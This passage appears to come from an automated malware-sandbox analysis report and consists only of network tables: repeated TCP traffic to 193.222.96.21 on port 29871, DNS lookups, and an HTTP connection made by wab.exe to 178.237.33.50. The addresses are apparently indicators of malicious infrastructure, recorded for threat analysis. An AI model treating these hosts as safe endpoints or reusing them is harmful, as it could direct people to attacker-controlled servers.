Apr 19, 2024 19:12:13.337893963 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337899923 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337910891 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337929010 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337945938 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337949038 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337963104 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337971926 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.337980032 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.337996960 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338016033 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338018894 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338035107 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338052034 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338062048 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338068962 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338085890 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338087082 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338105917 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338123083 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338131905 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338141918 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338152885 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338160038 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338176012 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338192940 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338205099 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338211060 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338227987 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338229895 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338248968 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338265896 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338285923 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338288069 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338288069 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338303089 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338321924 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338337898 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338340044 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338356018 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338361025 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338373899 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338392019 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338407993 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338416100 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338426113 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338434935 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338444948 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338462114 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338479042 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338488102 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338495970 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338507891 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338515043 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338531971 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338538885 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338550091 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338566065 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338583946 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338592052 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338602066 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338610888 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338622093 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338639975 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338656902 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338663101 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338675976 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338681936 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338695049 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338711977 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338720083 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338728905 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338747978 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338764906 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338771105 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338783026 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338789940 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338803053 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338821888 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338839054 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338850021 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338857889 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338871002 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338876963 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338893890 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338912964 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338917971 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338928938 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338937044 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.338954926 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338973999 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.338990927 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339000940 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339008093 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339023113 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339027882 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339045048 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339046001 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339065075 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339081049 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339099884 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339107990 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339117050 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339127064 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339135885 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339154005 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339164972 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339170933 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339188099 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339205980 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339206934 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339222908 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339241982 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339250088 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339257956 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339272022 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339277029 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339293957 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339312077 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339318991 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339329004 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339339972 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339345932 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339364052 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339373112 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339380026 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339399099 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339411020 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339416981 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339433908 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339449883 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339457989 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339467049 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339476109 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339484930 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339502096 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339512110 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339519978 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339536905 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339555979 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339562893 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339572906 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339582920 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339591026 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339607954 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339626074 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339632034 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339644909 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339651108 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:13.339664936 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:13.339721918 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:15.843961000 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:16.046437025 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:16.046947956 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:16.047183037 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:16.249686956 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:16.249718904 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:16.256575108 CEST | 29871 | 49739 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:16.257318020 CEST | 49739 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:26.536947966 CEST | 29871 | 49738 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:26.538985014 CEST | 49738 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:26.782613993 CEST | 29871 | 49738 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:56.585899115 CEST | 29871 | 49738 | 193.222.96.21 | 192.168.2.4 |
Apr 19, 2024 19:12:56.588608980 CEST | 49738 | 29871 | 192.168.2.4 | 193.222.96.21 |
Apr 19, 2024 19:12:56.844500065 CEST | 29871 | 49738 | 193.222.96.21 | 192.168.2.4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 19, 2024 19:12:07.224807978 CEST | 63072 | 53 | 192.168.2.4 | 1.1.1.1 |
Apr 19, 2024 19:12:07.550573111 CEST | 53 | 63072 | 1.1.1.1 | 192.168.2.4 |
Apr 19, 2024 19:12:10.912658930 CEST | 49646 | 53 | 192.168.2.4 | 1.1.1.1 |
Apr 19, 2024 19:12:11.058248043 CEST | 53 | 49646 | 1.1.1.1 | 192.168.2.4 |
Apr 19, 2024 19:12:11.704798937 CEST | 61355 | 53 | 192.168.2.4 | 1.1.1.1 |
Apr 19, 2024 19:12:11.813088894 CEST | 53 | 61355 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Apr 19, 2024 19:12:07.224807978 CEST | 192.168.2.4 | 1.1.1.1 | 0xdc59 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 19, 2024 19:12:10.912658930 CEST | 192.168.2.4 | 1.1.1.1 | 0xa31c | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 19, 2024 19:12:11.704798937 CEST | 192.168.2.4 | 1.1.1.1 | 0x1837 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Apr 19, 2024 19:12:07.550573111 CEST | 1.1.1.1 | 192.168.2.4 | 0xdc59 | No error (0) | 104.21.60.38 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 19:12:07.550573111 CEST | 1.1.1.1 | 192.168.2.4 | 0xdc59 | No error (0) | 172.67.191.112 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 19:12:11.058248043 CEST | 1.1.1.1 | 192.168.2.4 | 0xa31c | No error (0) | 193.222.96.21 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 19:12:11.813088894 CEST | 1.1.1.1 | 192.168.2.4 | 0x1837 | No error (0) | 178.237.33.50 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49740 | 178.237.33.50 | 80 | 7812 | C:\Program Files (x86)\Windows Mail\wab.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Apr 19, 2024 19:12:12.021416903 CEST | 71 | OUT | |
Apr 19, 2024 19:12:12.231025934 CEST | 1171 | IN |